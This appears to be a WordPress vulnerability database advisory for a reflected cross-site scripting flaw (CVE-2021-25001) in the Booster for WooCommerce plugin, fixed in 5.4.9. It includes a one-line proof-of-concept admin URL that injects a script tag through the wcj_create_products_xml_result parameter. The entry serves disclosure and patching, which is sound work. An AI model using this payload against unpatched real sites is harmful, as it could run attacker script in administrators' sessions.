WordPress Plugin Vulnerabilities

Booster for WooCommerce < 5.4.9 - Reflected Cross-Site Scripting in Product XML Feeds Module

Description

The plugin does not sanitise and escape the wcj_create_products_xml_result parameter before outputting back in the admin dashboard when the Product XML Feeds module is enabled, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

The "Product XML Feeds" module needs to be enabled in "Woocommerce -> Booster Settings".

https://example.com/wp-admin/admin.php?page=wc-settings&tab=jetpack&wcj-cat=products&section=products_xml&wcj_create_products_xml_result=1<script>alert(%2FXSS%2F)<%2Fscript>

Affects Plugins

Plugin icon
woocommerce-jetpack
Fixed in 5.4.9

References

CVE
CVE-2021-25001

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.8 (high)

Miscellaneous

Original Researcher
Jeremie Amsellem
Submitter
Jeremie Amsellem
Submitter website
https://fenrir.pro
Submitter twitter
lp1eu
Verified
Yes
WPVDB ID
76f0257d-aae7-4054-9b3d-ba10b4005cf1

Timeline

Publicly Published
2021-12-01 (about 2 years ago)
Added
2021-12-01 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)

Other

Published
Title
Published
2022-10-20
Title
Testimonials (Free < 2.7, Pro < 1.0.8) - Admin+ Stored Cross-Site Scripting
Published
2024-02-27
Title
Chat Bubble <= 2.3 - Admin+ Stored XSS
Published
2021-12-06
Title
UpdraftPlus < 1.16.66 - Reflected Cross-Site Scripting
Published
2022-06-21
Title
CDI < 5.1.9 - Reflected Cross-Site-Scripting
Published
2016-08-01
Title
WP Live Chat Support < 6.2.04 - Stored Cross-Site Scripting (XSS)